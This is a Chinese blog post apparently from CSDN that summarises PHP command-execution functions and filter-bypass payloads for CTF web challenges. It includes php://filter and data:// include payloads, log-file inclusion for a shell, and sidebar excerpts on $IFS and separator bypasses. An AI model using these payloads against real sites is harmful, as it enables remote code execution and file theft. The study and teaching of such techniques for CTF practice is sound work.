CTF命令执行部分总结

最新推荐文章于 2025-06-13 13:31:07 发布
最新推荐文章于 2025-06-13 13:31:07 发布
阅读量472 收藏 2
点赞数
CC 4.0 BY-SA版权
分类专栏: CTF 文章标签: php 开发语言 安全 学习 网络安全 安全威胁分析 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44770698/article/details/126892374

😋大家好,我是YAy_17,是一枚爱好网安的小白,正在自学ing。

本人水平有限,欢迎各位大佬指点,一起学习💗,一起进步⭐️

⭐️此后如竟没有炬火,我便是唯一的光。⭐️

关于CTF中的命令执行部分的题目以及常见的绕过方式,做以下的总结,仅仅是自己在做题的过程中学习到的知识,可能不太全面,或者是有许多的错误,还恳请各位师傅及时指出,谢谢!

常见的命令执行函数

exec()、system()、passthru()、pcntl_exec()、shell_exec() 、反引号` 、shell_exec()函数

exec()函数

该函数只返回最后一行的结果:

测试代码:

<?php
    echo exec('ping 127.0.0.1');
?>

system()函数

system函数:逐行返回数据;

<?php
    echo system('ping 127.0.0.1');
?>

passthru()函数

<?php
    echo passthru('ping 127.0.0.1');
?>

shell_exec()

<?php
    echo shell_exec('ping 127.0.0.1');
?>

反引号` 

反引号的效果和shell_exec是一样的;

<?php
    echo `ping 127.0.0.1`;
?>

<?php
    $payload = `whoami`;
    echo "{$payload}";
?>

nl命令 

nl命令在linux系统中用来计算文件中行号。nl 可以将输出的文件内容自动的加上行号,nl 可以将行号做比较多的显示设计,包括位数与是否自动补齐 0 等等的功能。

echo `nl flag.php`;

命令执行+文件包含

<?php

if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}
?>

命令执行还可以配合文件包含,对于上述的题目,我们可以使用include、require等文件包含函数进行绕过;

c=include($_GET[x]);&x=php://filter/read=convert.base64-encode/resource=flag.php

那么如果上述的正则表达式中添加(和;在这种情况下对于分号的绕过还可以使用?>来闭合

c=include$_GET[x]?>&x=php://filter/read=convert.base64-encode/resource=flag.php
if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
}

针对强制添加后缀名的绕过,可以使用data伪协议(参数污染)

data://text/plain;base64,<?php phpinfo()?>(语句要经过base64编码)

还可以通过包含日志文件,观察日志文件中的数据,通过抓包修改对应的信息,从而达到拿shell的目的;

if(!preg_match("/flag/i", $c)){
        include($c.".php");
}

上面的这种情况便是强制性的加上了php的后缀名,便可以使用data://text/plain。这样就相当于执行了php语句 .php 因为前面的php语句已经闭合了,所以后面的.php会被当成html页面直接显示在页面上,起不到什么作用;

命令执行类型CTF题目总结
Lelouch_E的博客
11-25 1523
命令执行类型CTFphp命令执行buu Online Tool禁止套娃 php命令执行 buu Online Tool 一段php代码审计: 大致意思是获取x-forward-for头后与glzjin拼接创建文件夹,将传入参数host通过escapeshellarg和escapeshellcmd方法转义后,转到之前创建的文件夹目录,执行nmap命令。 如果两方法以上述顺序执行会有绕过漏洞 传入的参数是:172.17.0.2‘ -v -d a=1 经过escapeshellarg处理后变成了’17
ctf命令执行小结
舞动的獾
10-04 4667
1.相关函数 eval函数eval函数能够将字符串当作命令去执行 需要被执行的字符串 代码不能包含打开/关闭 PHP tags。比如, ‘echo “Hi!”;’ 不能这样传入: ‘<?php echo "Hi!"; ?>’。但仍然可以用合适的 PHP tag 来离开、重新进入 PHP 模式。比如 ‘echo “In PHP mode!”; ?>In HTML mode!<...
CTF-命令执行部分总结
weixin_44770698的博客
05-29 1957
因为自己是小白,还是想着尽量快一点的学习到许多知识,最近又做了CTFshow里面的部分萌新题,这里总结一下其中的部分萌新WEB题。 web 9 要求我们使用GET方式传入c参数,参数中还要匹配到system或者exec等关键字,这里算是一个小坑,还以为是不能有这些关键字,还尝试了passthru、和拼接绕过......很尴尬。 这个比较简单我们使用system来执行查看config.php就可以了。 web 10 这个题的含义就是正则匹配到system、exec等,则会提示你cmd e
BUUCTF在线评测-练习场-WebCTF习题[ACTF2020 新生赛]Exec1-flag获取、解析
最新发布
m0_56970656的博客
06-13 474
比较简单的命令注入攻击吧,这里犯了点错误就是一开始没有尝试能否穿越目录查看目录下有什么文件,直接尝试查看/etc/passwd这些敏感文件了,结果一无所获..应该先看下整体有什么文件的,毕竟是个简单题。总结一下就是要会linux命令,管道符,cat,ls,绝对路径 相对路径。
gmailc2:一款基于Google SMTP的完全无法检测的C2服务器
qq_53058639的博客
07-24 1482
1、持久化;2、支持Shell访问;3、查看系统信息;4、…
CTF命令执行知识点总结
Hello_super的博客
09-17 1344
分隔命令 ; # 分号隔开每条命令,整行命令按照从左到右的顺序执行,彼此之间互不影响,所有的命令都会执行。 | # 只执行后面那条命令。 || # 只执前面那条命令。 & #两条命令都会执行。 && # 两条命令都会执行。 空格绕过 < <> # 需要写的权限 ${IFS} $IFS$9 %20 %...
ctf.show之命令执行
weixin_68477635的博客
09-26 234
web29 : 命令执行,需要严格的过滤
CTF密码学部分知识总结(一)
weixin_41038905的博客
04-27 7425
1.凯撒密码(Caesar) #!/usr/bin/python -- coding=utf -- def caesar(cipher): for j in range(26): str_list = list(cipher) i = 0 while i < len(cipher): if not str_list[i].isalpha(): str_list[i] = str_list[i...
CTFshow web入门之命令执行总结
小白的博客
05-10 618
1、命令执行函数
2024年网安最全ctfshow-web-命令执行
2401_84264610的博客
05-01 344
①直接执行系统命令???”);???②内敛执行??c=echo;③利用参数输入+eval?④利用参数输入+include+伪协议(不用括号、分号)?2. web30过滤了php、flag、system补充打印文件命令?c=echo%20;3. web31其他的过滤了无所谓,但过滤了.和空格①其实就是highlight_file(flag.php);的url编码,适用php7?c=(
CTF隐写总结
普通Gopher
09-30 3671
打了有小半年ctf比赛了,一直没有时间来写几篇关于ctf的博客,今天抽出时间写了点杂项中隐写的总结,希望能够帮到大家 简述 隐写术是一门关于信息隐藏的技巧与科学,所谓信息隐藏指的是不让除预期的接收者之外的任何人知晓信息的传递事件或者信息的内容。隐写术的英文叫做Steganography,来源于特里特米乌斯的一本讲述密码学与隐写术的著作Steganographia,该书书名源于希腊语,意为“隐秘书写...
CTF下的命令执行
热门推荐
Lemon's blog
04-28 1万+
前言: 之前学习命令执行,但不是太深入,这次通过题目的训练来深入学习一下命令执行
[GXYCTF2019]Ping Ping Ping {命令执行总结}
qq_42812036的博客
02-13 6155
0x00 知识点 命令注入 绕过空格、敏感字符、连接符 0x01 解题 方法一 内联执行 payload ?ip=1;a=f;d=ag;c=l;cat$IFS$a$c$d.php ps: 参数顺序要注意,adc换位acdflag会被检测出来:) 过滤了?/\{}()[]* 否则bash语法可以用“?”,正斜杠“/”,数字和字母来执行系统命令。 过滤空格 1.使用<或者<&gt...
Exec CTF题目
weixin_44971601的博客
09-29 475
BUUCTF命令执行漏洞题目
CTF中的命令执行绕过方式
2401_84466223的博客
06-03 1767
cat $b$a绕过空格就用上面提到的$IFS$1完整的payload 1;shell 提供了 && 和 || 来实现命令执行控制的功能,shell 将根据 && 或 || 前面命令的返回值来控制其后面命令的执行。连续使用管道意味着第一个命令的输出会作为 第二个命令的输入,第二个命令的输出又会作为第三个命令的输入,依此类推。默认情况下,进程是前台进程,这时就把Shell给占据了,我们无法进行其他操作,对于那些没有交互的进程,很多时候,我们希望将其在后台启动,可以在启动参数的时候加一个'&'实现这个目的。
ctfshow,命令执行系列
m0_73500273的博客
06-19 388
屏蔽的阐述有点多,采用文件包含。先让他多获取一个参数 a 并且执行就要用到include但是要加空格,空格被屏蔽了,尝试用进行转码有%0A是空格就有include%0A$_GET[a]这就是获取参数,下面就是构造文件了,这里哟啊用到php伪协议,使用data://进行执行 data://text/plain,后发现有两文件,使用tac进行读取。
CTF命令执行常见绕过
qq_42383069的博客
04-18 7623
在 linux 下表示分隔符,只有cat$IFSa.txt 的时候, bash 解释器会把整个 IFSa当做变量名,所以导致没有办法运行,然而如果加一个 {} 就固定了变量名,同理在后面加个 $ 可以起到截断的作用,而 $9 指的是当前系统shell 进程的第九个参数的持有者,就是一个空字符串,因此 $9 相当于没有加东西,等于做了一个前后隔离。]有一个重要的区别,当匹配的文件不存在,[…通过测试,可见程序过滤了截断符,根据以上的知识,我们来fuzz一下可用的截断符。根据burp爆破,发现可以通过。
CTF 命令执行绕过总结
jnszstmei的博客
06-01 1309
tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示。或:rce-xor-or.php & rce-xor-or.py。# ls -t >shell 将输出输入到shell文件中。异或:rce-xor.php & rce-xor.py。%09(url传递)(cat%09flag.php)sh /flag 2>%261 //报错出文件内容。2、1使用空变量$*和$@,$x,${x}绕过。7、异或无符号(过滤0-9a-zA-Z)more:一页一页的显示档案内容。
ctfhub技能树web rce 命令注入
03-29
### CTFHub 技能树 Web RCE 命令注入 练习题及解法 #### 关于RCE(远程命令执行) 远程命令执行漏洞允许攻击者通过应用程序接口向服务器发送恶意指令并获得响应。这种类型的漏洞通常发生在输入未被充分验证的情况下,使得攻击者能够利用特定的字符串来触发系统的 shell 执行功能。 在 CTFHub 的技能树中提到的一个典型场景是使用 Hackbar 插件配合 GET 请求传递参数 `ctfhub` 来实现文件遍历操作[^1]。此过程展示了如何通过构造特殊的 URL 参数让目标程序暴露其内部结构甚至敏感数据。 #### 实践案例分析 假设存在这样一个脆弱点:当用户访问某个页面时可以指定额外选项作为查询条件的一部分;如果开发者没有对这些外部可控变量加以过滤,则可能形成安全隐患。例如,在下面的例子中,我们尝试调用 Linux 系统自带的一些基本工具完成任务: ```bash ?cmd=ls / ``` 上述请求会返回根目录下的所有子项列表[^3]。进一步地,为了读取具体的目标文件内容,我们可以继续提交如下形式的数据包给服务端处理: ```bash ?cmd=cat flag.txt ``` 这一步骤最终实现了从远端提取到所需的标志位信息——即所谓的 “Flag”。 #### 编码实践中的防御措施 为了避免此类问题的发生,应当采取以下策略之一或者组合应用它们以增强安全性: - **白名单机制**:仅接受预定义范围内的合法值; - **转义特殊字符**:对于不可信来源的内容做适当转换以免干扰正常解析流程; - **最小权限原则**:确保运行环境只拥有刚好够用的权利而不会越界行事。 以下是基于 PHP 语言编写的一段示范代码片段用于演示安全编码方式预防潜在威胁的方法: ```php <?php // 安全版本: 使用 escapeshellarg 函数防止非法字符进入系统调用层 $command = 'echo '.escapeshellarg($_GET['input']); exec($command, $output); print_r($output); ?> ``` #### 总结 通过对实际题目解决方案的学习以及常见防护手段的研究可以帮助参赛选手更好地理解 web 应用开发过程中需要注意的安全事项,并提高解决类似挑战的能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Y4y17

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值